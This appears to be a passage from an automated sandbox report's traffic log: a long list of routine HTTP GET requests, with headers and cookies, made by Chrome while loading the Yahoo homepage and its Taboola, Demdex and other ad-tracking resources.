Source: global trafficHTTP traffic detected: GET /ybar/exp.json HTTP/1.1Host: edge-mcdn.secure.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://www.yahoo.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /uu/api/res/1.2/wf4JZe1gzftkEKJyi73iwA--~B/Zmk9c3RyaW07aD0yODQ7cT04MDt3PTUzNjthcHBpZD15dGFjaHlvbg--/https://media.zenfs.com/en/the_spruce_188/01d9030260c40e4271776a19d81dcb0d.cf.webp HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /aaq/c/755f6a7.caas-news_web.min.js HTTP/1.1Host: s.yimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ibs:dpid=30646?dpuuid=y-phWjmapE2pFlmUp6fd40ho1y9pZXqldhkLA-~A&redir=https%3A%2F%2Fups.analytics.yahoo.com%2Fups%2F58782%2Fcms%3Fpartner_id%3DADOBE%26_origin%3Dfalse%26_redirect%3Dfalse%26_hosted_id%3D%24%7BDD_UUID%7D HTTP/1.1Host: dpm.demdex.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /uu/api/res/1.2/f3GRHZeRABNpJiPbHs4McA--~B/Zmk9c3RyaW07aD0yODQ7cT04MDt3PTUzNjthcHBpZD15dGFjaHlvbg--/https://media.zenfs.com/en/wwd_409/a6afc674d9b56b0fa8f0f824d671500c.cf.webp HTTP/1.1Host: s.yimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /uu/api/res/1.2/W7BlkVb3JweZnQNoIkHchA--~B/Zmk9c3RyaW07aD0yODQ7cT04MDt3PTUzNjthcHBpZD15dGFjaHlvbg--/https://media.zenfs.com/en/miami_herald_mcclatchy_975/6cc52b158992fe8218d9d85b25491d91.cf.webp HTTP/1.1Host: s.yimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /uu/api/res/1.2/Lg5WgrqEEIfUVDSR.3ISjQ--~B/Zmk9c3RyaW07aD0yODQ7cT04MDt3PTUzNjthcHBpZD15dGFjaHlvbg--/https://media.zenfs.com/en/usa_today_news_641/e0e4d3ffc4cc8cc7accd7efa9f2d137d.cf.webp HTTP/1.1Host: s.yimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /uu/api/res/1.2/NHD3rrn1.wLWnNRxMGteMQ--~B/Zmk9c3RyaW07aD0yODQ7cT04MDt3PTUzNjthcHBpZD15dGFjaHlvbg--/https://media.zenfs.com/en/insider_articles_922/ba89a0be2fcc3c8cd4db6f4cee05297e.cf.webp HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /uu/api/res/1.2/bL99WRZEMid6IrkjErw_rw--~B/Zmk9c3RyaW07aD0yODQ7cT04MDt3PTUzNjthcHBpZD15dGFjaHlvbg--/https://media.zenfs.com/en/the_enquirer_natl_articles_358/0190bd8563fb5656c0d97f677093e9c0.cf.webp HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /libtrc/impl.20240929-12-RELEASE.js HTTP/1.1Host: cdn.taboola.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: abLdr=26; receive-cookie-deprecation=1; t_gid=718c48d0-56f4-46af-b98a-81a327f4b9c5-tuctdf46383; t_pt_gid=718c48d0-56f4-46af-b98a-81a327f4b9c5-tuctdf46383
Source: global trafficHTTP traffic detected: GET /adscores/g.pixel?sid=9202214988&yho=y-tJYw.JlE2p5NhgKpc7k9ZRSggsb6jE9uAgY-~A HTTP/1.1Host: aa.agkn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /sg/yahoo_axid--yahoo_paxid/1/um/?axid=y-GxlMYYJE2uKUC.fndnfIPNmh3DR_ejLH~A&paxid=&gdpr=0&gpp_sid=-1&gpp=DBAA&ui=718c48d0-56f4-46af-b98a-81a327f4b9c5-tuctdf46383&us_privacy=1YNN HTTP/1.1Host: trc.taboola.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: t_pid=27eb735b-f48b-4088-80a5-78ec8c9435df-tuctdf46380; receive-cookie-deprecation=1; t_gid=718c48d0-56f4-46af-b98a-81a327f4b9c5-tuctdf46383; t_pt_gid=718c48d0-56f4-46af-b98a-81a327f4b9c5-tuctdf46383
Source: global trafficHTTP traffic detected: GET /aaq/vzm/cs_1.6.6.js HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /oath/1/info?sType=sync&_sdv&sExtCookieId=y-utA7x.JE2oM7UhEgkHtPGjDCEovUviSB184-~A&sInitiator=external HTTP/1.1Host: uipglob.semasio.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /aaq/notifications/js/sh-5.17.91.js HTTP/1.1Host: s.yimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /aaq/hc/homepage-pwa-defer-1.1.6.js HTTP/1.1Host: s.yimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /service-worker.js HTTP/1.1Host: www.yahoo.comConnection: keep-aliveCache-Control: max-age=0Accept: */*Service-Worker: scriptSec-Fetch-Site: same-originSec-Fetch-Mode: same-originSec-Fetch-Dest: serviceworkerReferer: https://www.yahoo.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A3=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A1S=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; cmp=t=1727716858&j=0&u=1YNN; gpp=DBAA; gpp_sid=-1; axids=gam=y-PMOp3thE2uLhyy8QFBkAKGqNgLvzneG4~A&dv360=eS1LZzdROG1GRTJ1RVZ3MWZ2WWt1bTRBdVAxOElBSy5Dbn5B&ydsp=y-WXkjhRBE2uJjlZ_QwZAT4oBAasxO1UgW~A&tbla=y-GxlMYYJE2uKUC.fndnfIPNmh3DR_ejLH~A; tbla_id=718c48d0-56f4-46af-b98a-81a327f4b9c5-tuctdf46383; trc_cookie_storage=taboola%2520global%253Auser-id%3D27eb735b-f48b-4088-80a5-78ec8c9435df-tuctdf46380
Source: global trafficHTTP traffic detected: GET /aaq/fp/css/react-wafer-shopping.ShoppingContent.atomic.ltr.1d44a92ce88f1df1ccb0dcecff203bbd.min.css HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /demconf.jpg?et:ibs%7cdata:dpid=30646 HTTP/1.1Host: dpm.demdex.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: demdex=86882777560484617681301632197120982451
Source: global trafficHTTP traffic detected: GET /ybar/exp.json HTTP/1.1Host: edge-mcdn.secure.yahoo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A3=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A1S=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; cmp=t=1727716858&j=0&u=1YNN; gpp=DBAA; gpp_sid=-1; axids=gam=y-PMOp3thE2uLhyy8QFBkAKGqNgLvzneG4~A&dv360=eS1LZzdROG1GRTJ1RVZ3MWZ2WWt1bTRBdVAxOElBSy5Dbn5B&ydsp=y-WXkjhRBE2uJjlZ_QwZAT4oBAasxO1UgW~A&tbla=y-GxlMYYJE2uKUC.fndnfIPNmh3DR_ejLH~A; tbla_id=718c48d0-56f4-46af-b98a-81a327f4b9c5-tuctdf46383
Source: global trafficHTTP traffic detected: GET /aaq/fp/css/react-wafer-shopping.custom.desktop.fdf1fc8fe6bc6d08523f7958b8edf2b5.css HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /scripts/cds-pips.js HTTP/1.1Host: cdn.taboola.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.yahoo.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pv/static/img/voiceSearch1x-1620383531565.min.png HTTP/1.1Host: s.yimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /uu/api/res/1.2/wf4JZe1gzftkEKJyi73iwA--~B/Zmk9c3RyaW07aD0yODQ7cT04MDt3PTUzNjthcHBpZD15dGFjaHlvbg--/https://media.zenfs.com/en/the_spruce_188/01d9030260c40e4271776a19d81dcb0d.cf.webp HTTP/1.1Host: s.yimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /taboola/image/fetch/c_crop%2Cf_jpg%2Cq_auto%2Ce_sharpen%2Car_1.9100%2Cw_1200%2Cx_0%2Cy_11/c_fill%2Cw_340%2Ch_179/http%3A//cdn.taboola.com/libtrc/static/thumbnails/9cc49da8e6bbb68a4a886a5bc8ac7872.png HTTP/1.1Host: images.taboola.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: receive-cookie-deprecation=1; t_gid=718c48d0-56f4-46af-b98a-81a327f4b9c5-tuctdf46383; t_pt_gid=718c48d0-56f4-46af-b98a-81a327f4b9c5-tuctdf46383
Source: global trafficHTTP traffic detected: GET /aaq/f10d509c/d1ccw66oyq8ex2.js HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /taboola/image/fetch/f_jpg%2Cq_auto%2Ch_179%2Cw_340%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A//cdn.taboola.com/libtrc/static/thumbnails/0ecf13bd0c5698f9380cda21a35784a0.jpg HTTP/1.1Host: images.taboola.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: receive-cookie-deprecation=1; t_gid=718c48d0-56f4-46af-b98a-81a327f4b9c5-tuctdf46383; t_pt_gid=718c48d0-56f4-46af-b98a-81a327f4b9c5-tuctdf46383
Source: global trafficHTTP traffic detected: GET /uu/api/res/1.2/NHD3rrn1.wLWnNRxMGteMQ--~B/Zmk9c3RyaW07aD0yODQ7cT04MDt3PTUzNjthcHBpZD15dGFjaHlvbg--/https://media.zenfs.com/en/insider_articles_922/ba89a0be2fcc3c8cd4db6f4cee05297e.cf.webp HTTP/1.1Host: s.yimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /uu/api/res/1.2/bL99WRZEMid6IrkjErw_rw--~B/Zmk9c3RyaW07aD0yODQ7cT04MDt3PTUzNjthcHBpZD15dGFjaHlvbg--/https://media.zenfs.com/en/the_enquirer_natl_articles_358/0190bd8563fb5656c0d97f677093e9c0.cf.webp HTTP/1.1Host: s.yimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /oath/1/info?sType=sync&_sdv&sExtCookieId=y-utA7x.JE2oM7UhEgkHtPGjDCEovUviSB184-~A&sInitiator=external HTTP/1.1Host: uipus.semasio.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /fp_ms/_rcv/remote?ctrl=ShoppingContent&m_id=react-wafer-shopping&m_mode=json&xhrPathPrefix=%2Ffp_ms%2F_rcv%2Fremote HTTP/1.1Host: www.yahoo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A3=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A1S=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; cmp=t=1727716858&j=0&u=1YNN; gpp=DBAA; gpp_sid=-1; axids=gam=y-PMOp3thE2uLhyy8QFBkAKGqNgLvzneG4~A&dv360=eS1LZzdROG1GRTJ1RVZ3MWZ2WWt1bTRBdVAxOElBSy5Dbn5B&ydsp=y-WXkjhRBE2uJjlZ_QwZAT4oBAasxO1UgW~A&tbla=y-GxlMYYJE2uKUC.fndnfIPNmh3DR_ejLH~A; tbla_id=718c48d0-56f4-46af-b98a-81a327f4b9c5-tuctdf46383; trc_cookie_storage=taboola%2520global%253Auser-id%3D27eb735b-f48b-4088-80a5-78ec8c9435df-tuctdf46380
Source: global trafficHTTP traffic detected: GET /du/ay/wnsrvbjmeprtfrnfx.js HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /aaq/prebid/prebid-2.0.js HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /aaq/wf/wf-autocomplete-1.31.8-modern.js HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /aaq/vzm/cs_1.6.6.js HTTP/1.1Host: s.yimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_td_api/beacon/info?event=activate&spaceId=1197802003&version=1.1.53&scope=https://www.yahoo.com/&subscription_endpoint=null&metadataTime=4&src=notification-sw&code=info HTTP/1.1Host: www.yahoo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://www.yahoo.com/service-worker.jsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A3=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; 